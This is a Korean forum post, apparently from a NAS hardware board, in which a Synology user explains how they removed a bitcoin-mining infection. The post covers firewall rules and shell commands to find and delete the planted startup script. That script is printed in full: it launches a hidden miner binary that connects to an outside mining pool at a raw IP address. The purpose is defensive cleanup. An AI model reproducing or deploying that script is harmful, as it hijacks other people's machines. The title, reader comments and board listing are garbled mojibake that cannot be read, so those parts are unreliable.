ºñÆ®ÄÚÀÎ ÇØÅ·¿¡ ´ëóÇÑ (Áö±ØÈ÷ °³ÀÎÀûÀÎ) ¼º°ø´ã

   Á¶È¸ 6899   Ãßõ 0    

5.0으로 옮겨가고 싶지만 hyper-v를 써야하는 사정이라 아직 4.2버전을 사용하고 있습니다.
최근 3일동안 해킹이 발생하지 않아서 "이건가?!" 하는 생각에 개인적인 방법을 공유합니다. 
(공유이기도 하고 다음에 혹시 재설치 할 경우 다시보려는 기록이기도 합니다^^;)

1. NAS의 방화벽 설정에서 기본 서비스포트를 제외한 나머지를 모두 차단합니다.
방화벽은 설정의 순서가 중요합니다. 허용을 위에 거부를 아래에 놓아야합니다.
ssh를 사용한다면 특정 IP만 허용하고 나머지는 모두 차단하세요.
<아래그림은 서비스 포트 접속 허용 설정화면>
<아래그림은 모든포트,프로토콜,소스IP 거부설정>

2. 자동차단을 활성화 해둡니다.

3. 게시물 "http://2cpu.co.kr/bbs/board.php?bo_table=nas&wr_id=2023"에서 답글로 진행했었던 데로 합니다.
붉은색은 주의해서 실행해야할 명령입니다.
## S99p.sh를 찾아서 내용 확인하고 지웁니다. 내용에서 확인되는 PWNED는 소심하게 이름을 바꿨어요. 
>cd / 
>find / -name S99p.sh 
/usr/syno/etc.defaults/rc.d/S99p.sh 
> cat /usr/syno/etc.defaults/rc.d/S99p.sh 
#!/bin/sh 
su -c "cd /PWNED && ./PWNEDm -o 'stratum+tcp://46.244.18.176:9555' &" -s /bin/sh smmsp 
su -c "cd /PWNED && ./PWNEDb &" -s /bin/sh smmsp 
>mv PWNED PWNED_bak 
>rm /usr/syno/etc.defaults/rc.d/S99p.sh 

## CPU를 점거하는 백그라운드 프로세스를 찾아봅니다. 
>find /proc -name "stat" | xargs grep "httpd-log.pid" 
## 위 검색 결과에서 맨위 파일(PID)을 kill하면 나머지도 kill됩니다. 
>kill 123456 (검색된 PID)

## lolz 스크립트가 포함된 파일을 찾아봅니다.
>find / -name "rc.*" | xargs grep "lolz" 
>find / -name "profile" | xargs grep "lolz" 
>find / -name "*.sh" | xargs grep "lolz"
## 위 검색에서 발견된 파일이 있다면 vi로 편집하거나 삭제하세요. (저는 발견되는게 없었습니다)

## rc.local파일이 오염됐는지 확인해서 오염됐다면 수정한 후 실행/수정 불가로 만듭니다. (위 S99p.sh와 유사하게 오염됐더군요)
>cat /etc/rc.local
>chmod -wx /etc/rc.local

서버를 재시작해봅니다.. CPU점유를 확인해봅니다.
다른 게시물을보니, 모바일(DS finder)에서는 CPU점유율이 정확하게 판독된다고 하네요.

좀비프로세스가 어디서 뜨는지 찾으려고 구동될때 녹화해서 한프레임씩 확인했었습니다.
rc.local가 부팅시 변조되는것 같아서 마지막처럼 수정/실행 불가로 한건데.. 맞겠지요;
이렇게 한 후엔 재시작해도 좀비 프로세스가 뜨질 않네요. ^^;


ªÀº±Û Àϼö·Ï ½ÅÁßÇÏ°Ô.
°­¼ºÁø00 2014-02
À̹ø ÇØÅ·Àº Àú±â Çã¿ëµÈ 80, 443, 5000, 5001 Æ÷Æ®·Î µé¾î¿Â °É·Î ¾Ë°í ÀÖ½À´Ï´Ù. (CGI È£Ãâ ÇØÅ·À̶ó¼­)

À§ ó·³ ±âº»¼­ºñ½º Æ÷Æ®(80, 443, 5000, 5001)°¡ °è¼Ó ¿­·Á ÀÖ°í, º¸¾ÈÆÐÄ¡°¡ ¾ÈµÇ¾î ÀÖ´Ù¸é

¿©ÀüÈ÷ ±¸¸ÛÀº ¿­·Á ÀÖ´Â °Í °°½À´Ï´Ù ;;
ÇÑ·ûÈñ 2014-02
CGI ÅëÇؼ­ µé¾î¿Ô±â¿¡,, ÇÁ·ÎÅäÄÝÇÏ°í °ü°è ¾ø½À´Ï´Ù.. ¾Æ¸¶ ƯÁ¤ IP Çã¿ëÀ¸·Î ÇسõÀ¸¼Å¼­ ´õÀÌ»ó °ø°ÝÀÌ µé¾î¿ÀÁö ¾Ê´Â°ÅÀÏ°Å¿¡¿ä..
     
¿À³ª±â 2014-02
ƯÁ¤IP Çã¿ëÀº SSH¸¸ ¿­¾îµ×½À´Ï´Ù.
±×·¯°íº¸´Ï ¿ÖÀϱî?? ¶ó´Â ÀDZ¸½ÉÀÌ µå³×¿ä. ¸îÀÏ ´õ µÎ°í ºÁ¾ß°Ú½À´Ï´Ù.
          
ÇÑ·ûÈñ 2014-02
±×·¸´Ù¸é... ±¸¸íÀº ÀÌ¹Ì ¿­·ÁÀÖ½À´Ï´Ù ..
Á¶ºÀÁØ 2014-02
±×·¡¼­ Àü ¸ðµÎ ¸·°í ¿ÜºÎÆ÷Æ®´Â FTP(21,55536-55599)¿Í Webdav(5005) Æ÷Æ®¸¸ ¿­¾î³ù½À´Ï´Ù.

±×¸®°í À¥ Á¢¼ÓÀº VPNÀ¸·Î....

¸îÀÏ µÎ°í ºÁ¾ß°Ú½À´Ï´Ù.
     
ÇÑ·ûÈñ 2014-02
ÀÌ·¸°Ô ÇÏ¸é ±¦ÂúÁÒ. À¥¿¡ Á÷Á¢ Á¢±ÙÀ» ¸øÇÏ´Ï..
¿À³ª±â 2014-02
1ÁÖÀÏ °æ°ú.. ¾ÆÁ÷ ÇØÅ· Àç¹ß ¾ÈÇÏ°í Àß µ¹¾Æ°¡³×¿ä.


NAS
Á¦¸ñPage 289/307
2015-12   1520231   ¹é¸Þ°¡
2014-05   4984243   Á¤ÀºÁØ1
2014-02   13814   ´ÚÅ͵¶
2014-02   4479   ¾Ö±³Äá
2014-02   5534   Ç㼺ÈÆ
2014-02   15174   µÅÁöÅнº
2014-02   4665   ¾Ö±³Äá
2014-02   5876   ¼º±â»ç
2014-02   6900   ¿À³ª±â
2014-02   5649   ¼º¹Ù¿À·Î
2014-02   5732   ¸¸°õÀÌ
2014-02   4817   Ryun
2014-02   5281   ´ÏÆ÷
2014-02   11728   ¿¡µå¾ÆÀÎ
2014-02   4268   ÀÌÇØÂù
2014-02   5616   ´ÞºÀÀÌ
2014-02   4845   ±èÈÆ1
2014-02   6205   ´ÏÆ÷
2014-02   5684   µÅÁöÅнº
2014-02   6854   ¼Û»óº´
2014-02   6202   ¼Û°­¹Î
2014-02   6964   ±èÁØÀ¯